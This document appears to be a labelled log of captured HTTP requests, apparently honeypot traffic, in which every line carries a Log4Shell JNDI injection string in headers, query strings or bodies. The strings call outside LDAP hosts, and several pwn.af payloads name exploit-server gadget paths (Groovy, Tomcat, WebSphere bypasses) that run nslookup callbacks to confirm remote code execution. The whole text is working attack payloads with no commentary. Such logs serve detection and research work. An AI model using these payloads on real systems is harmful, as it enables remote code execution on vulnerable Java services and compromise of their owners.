GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://bea48214e715.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://4c3564dc3448.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2672fdd4d9dc.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://44cca783ad16.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://013982df19dc.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://852a92bab238.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a60bb4d20c87.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://549d5ed68112.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f878570be49d.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://0005f49368dd.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://79f971315e86.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://efd672a31f1d.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cae2a7d6dd75.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup%20nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.groovy.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.groovy.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.groovy.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d331a3b8142b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://eb1b0fc46d80.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a372a16e46fb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7c1488d8d063.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://184dcac8da3c.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f19d3d3b600a.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d4f22825f860.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cb734220a05d.bingsearchlib.com:39356/a} 1
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: id=aaa358a9-6f62-4025-b728-ca6b73bd8c8e User-Agent: ${jndi:ldap://134.209.163.248:389/callback/responder} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://d5e1b4f370cd.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET /?q=${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.websphere.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.websphere.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.websphere.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8e37da3fcdba.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://447d3a339473.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7c5bc4d457d1.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e2bcafb6432f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7971f7b4eb13.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://ef144e2d943b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://910eef74df8d.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 Connection: close Content-Length: 67 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://c6pa9p4pu896aholv1rgcg3kkxayy5knq.interactsh.com/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://e533b9b7724f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a0294c819682.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Connection: close Content-Length: 85 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://567d24d1ac33.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://1f0e4d34cb8f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fc143e8b8721.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://525b9f8c810a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://169745c9aebb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://90a6fd44cd31.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://124268d89547.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://dcff09bd4870.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 Connection: close Content-Length: 84 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c79f0d1aa0ab.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://8fa951c85ea3.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a58bc1fc518a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://84af80632822.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://81f487a10cb5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5e7baaf46dc0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://ac8e3c1c398d.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 Connection: close Content-Length: 67 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://c6pa9p4pu896aholv1rgcg3kkmoyysfcw.interactsh.com/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: ${jndi:ldap://<IP_ADDRESS>.c6pnncggjk7jk873c9e0cg3zzcoyyyyyn.interactsh.com/999} 1
GET /?q=${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup%20nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.groovy.li466-34.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li466-34.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.groovy.li466-34.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.groovy.li466-34.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://910eef74df8d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cbac4cbd9ab7.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5486b6edd688.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://75e94c926b75.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://adac95b08630.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b439b2d4f669.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup%20nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.groovy.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.groovy.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.groovy.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://bc3b328b071a.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c17f75217c47.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.websphere.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.websphere.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/WebsphereBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.websphere.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://9b8c025d4781.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://bb6f692aae16.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://29e3059e832c.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://262ade32441e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://27a2a4c5895f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cff1fbafb9a9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://eb90e696775b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d22485f86152.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://0a8d2f72ee8e.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://f6634b129f94.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://1606be04fe34.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://852fc4e007a5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c87486ee5ca5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://647c6fdbe0ce.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://33d280df2b53.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://4fd955429073.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a74d01648bea.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://45cecd2f38ca.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1766270cce8d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://3564a4a65bc8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e6e7c03c998d.bingsearchlib.com:39356/a} 1
GET /$%7Bjndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b%7D?${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b} HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b} Cache-Control: ${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b} Cookie: ${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b} X-Leakix: ${jndi:ldaps://d988d853.probe001.log4j.leakix.net:12042/b} Accept-Encoding: gzip Connection: close 1
GET /?test=${jndi:ldap://c6popvdr3jkuh539pas0cg33tjyyynz7g.interactsh.com/a} HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: Mozilla ${jndi:ldap://c6popvdr3jkuh539pas0cg33tjyyynz7e.interactsh.com/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8e1dab694af9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://eefd52543f2b.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fc7d972ac028.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://89108dc06d90.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://646feaf14808.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://b6b34cfd1b59.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://0ce7fec15358.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b445454d1b03.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://97b23f4fdbbe.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://5366eae72dec.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://09adfa0a2dac.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://785780daf45b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://54c015aff381.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Content-Length: 86 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net:80/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://86dd04a76591.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c961c04db902.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://12e3621bf406.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://78f079ee26bc.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://38.86.22.32.c6pnncggjk7jk873c9e0cg3zzcoyyyyyn.interactsh.com/999} Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://713cf0ac1632.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.tomcat.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.tomcat.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.tomcat.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://42ba685e49f3.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f2a8abaf2ddb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://12e31f4d026b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d2670da6a5c1.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://f73fb894272e.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://63a4925ae323.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c17dff990109.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://10c100254da9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://94b53a59053e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://626b5d44765f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b6b34cfd1b59.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8ff4814c2663.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://da28f3f294f3.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.tomcat.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.tomcat.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.tomcat.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://9040b8e6bea8.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e08499cffcd8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d80db2c7a5e8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://ef8908f80ff4.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup%20nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.groovy.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.groovy.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/GroovyBypass/Command/nslookup nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.groovy.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://690f3230afae.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389//Basic/Command/nslookup+nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.basic.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.basic.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/Basic/Command/nslookup nucleix.226FaYXBJYTTEBFvRLfOXTzMYpd.basic.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a40d65b21b7f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2463193f0648.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://35ff36e69c90.bingsearchlib.com:39356/a} 1
